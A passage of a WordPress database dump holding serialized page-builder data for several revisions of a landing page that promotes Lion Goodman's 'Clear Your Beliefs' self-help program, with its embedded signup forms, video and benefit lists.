[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1260, 1732, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 25px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -33px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1261, 1733, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 25px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -33px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1262, 1734, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -33px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" 